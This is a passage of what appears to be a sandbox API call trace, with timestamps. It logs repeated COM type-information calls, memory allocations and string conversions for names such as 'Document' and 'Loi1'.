0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbb, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbc, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbd, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbe, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbf, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc0, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc1, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc2, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc3, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc4, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc5, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc6, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc7, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc8, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.281] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc9, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.281] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xca, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcb, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcc, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcd, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xce, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcf, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd0, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd1, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd2, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd3, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd4, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd5, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd6, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd7, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd8, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd9, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xda, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdb, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.282] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.282] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdc, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdd, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xde, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdf, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe0, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe1, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe2, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe3, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe4, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe5, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe6, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe7, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe8, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe9, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xea, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xeb, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xec, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xed, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.283] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xee, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.283] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xef, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf0, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf1, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf2, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf3, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf4, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf5, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf6, ppFuncDesc=0x2068f8, pDummy=0x140 | out: ppFuncDesc=0x2068f8, pDummy=0x140) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf7, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf8, ppFuncDesc=0x2068f8, pDummy=0xc0 | out: ppFuncDesc=0x2068f8, pDummy=0xc0) returned 0x0 [0045.284] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.284] ITypeInfo2:GetCustData (in: This=0x7f722f0, GUID=0x7fee403d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x206928 | out: pVarVal=0x206928*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0045.284] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.284] ITypeInfo:RemoteGetDocumentation (in: This=0x7f722f0, memid=-1, refPtrFlags=0x206920, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x206830, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0045.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0045.284] IMalloc:Realloc (This=0x7feff045380, pv=0x8188280, cb=0x62) returned 0x80704a0 [0045.285] IMalloc:Alloc (This=0x7feff045380, cb=0xc0) returned 0x8134810 [0045.285] IMalloc:GetSize (This=0x7feff045380, pv=0x8134810) returned 0xc0 [0045.292] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x206b50, pDummy=0x81f5c40 | out: ppTypeAttr=0x206b50, pDummy=0x81f5c40*=0x202c0007) returned 0x0 [0045.292] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.292] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f723a0, index=0x0, pRefType=0x206b48 | out: pRefType=0x206b48*=0x3) returned 0x0 [0045.292] ITypeInfo:GetRefTypeInfo (in: This=0x7f723a0, hreftype=0x3, ppTInfo=0x206b58 | out: ppTInfo=0x206b58*=0x8137308) returned 0x0 [0045.292] IUnknown:Release (This=0x7f723a0) returned 0x1 [0045.292] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x206b50, pDummy=0x206b28 | out: ppTypeAttr=0x206b50, pDummy=0x206b28*=0x3) returned 0x0 [0045.293] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.293] ITypeInfo:GetRefTypeOfImplType (in: This=0x8137308, index=0x0, pRefType=0x206b48 | out: pRefType=0x206b48*=0x182) returned 0x0 [0045.293] ITypeInfo:GetRefTypeInfo (in: This=0x8137308, hreftype=0x182, ppTInfo=0x206b58 | out: ppTInfo=0x206b58*=0x8137360) returned 0x0 [0045.293] IUnknown:Release (This=0x8137308) returned 0x1 [0045.293] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137360, ppTypeAttr=0x206b50, pDummy=0x206b30 | out: ppTypeAttr=0x206b50, pDummy=0x206b30*=0x206b60) returned 0x0 [0045.293] ITypeInfo:LocalReleaseTypeAttr (This=0x8137360) returned 0x0 [0045.293] IUnknown:Release (This=0x8137360) returned 0x1 [0045.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="015e399ea6", cchWideChar=11, lpMultiByteStr=0x206b40, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="015e399ea6", lpUsedDefaultChar=0x0) returned 11 [0045.293] GetLocalTime (in: lpSystemTime=0x206c28 | out: lpSystemTime=0x206c28*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xb, wMilliseconds=0x40)) [0045.293] _ultow_s (in: _Value=0x5e399ea7, _Buffer=0x81d755c, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e399ea7") returned 0x0 [0045.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="065e399ea7", cchWideChar=11, lpMultiByteStr=0x206b80, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="065e399ea7", lpUsedDefaultChar=0x0) returned 11 [0045.293] IMalloc:Alloc (This=0x7feff045380, cb=0x60) returned 0x8070510 [0045.293] IMalloc:GetSize (This=0x7feff045380, pv=0x8070510) returned 0x60 [0045.293] IMalloc:Free (This=0x7feff045380, pv=0x8070510) [0045.293] IMalloc:Realloc (This=0x7feff045380, pv=0x810a1a0, cb=0x200) returned 0x80618e0 [0045.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Loi1", cchWideChar=5, lpMultiByteStr=0x2069c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Loi1", lpUsedDefaultChar=0x0) returned 5 [0045.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loi1") returned 0x10b1ab [0045.293] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.294] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2066c8 | out: ppvObject=0x2066c8*=0x7f722f0) returned 0x0 [0045.294] ITypeInfo2:GetCustData (in: This=0x7f722f0, GUID=0x7fee403d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x2066d8 | out: pVarVal=0x2066d8*(varType=0x0, wReserved1=0x20, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0045.294] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.294] ITypeInfo:RemoteGetDocumentation (in: This=0x7f722f0, memid=-1, refPtrFlags=0x2066d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2066f0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2066f0*="") returned 0x0 [0045.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2065e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0045.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0045.294] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x2066d0, pDummy=0x0 | out: ppTypeAttr=0x2066d0, pDummy=0x0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x0, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.294] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: 